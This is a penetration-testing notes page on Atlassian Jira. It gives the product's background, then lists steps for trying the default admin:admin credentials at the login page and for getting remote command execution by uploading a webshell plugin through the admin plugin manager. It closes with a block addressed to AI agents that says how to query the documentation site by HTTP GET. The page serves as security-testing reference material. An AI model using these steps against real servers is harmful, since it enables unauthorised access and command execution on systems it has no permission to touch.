# Jira

### Overview

Jira is a proprietary issue tracking product developed in Java by Atlassian and initially released in 2002 which allows bug tracking and agile project management.

According to Atlassian, Jira is used for issue tracking and project management by over 75,000 customers in 122 countries.

### Login prompt & default credentials

Access the logon prompt at the URL below and try the default SDK credentials `admin:admin`.

```
<http | https>://<HOST | IP>/login.jsp
```

### Administrator interface to RCE

Upload the `atlassian-webshell-plugin\atlplug.jar` through the admin web interface:

```
<http | https>://<HOST | IP>/plugins/servlet/upm
```

Then start and access it to execute system command:

```
<http | https>://<HOST | IP>/plugins/servlet/com.jsos.shell/ShellServlet
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.qazeer.io/web-applications/cms_and_softwares/jira.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
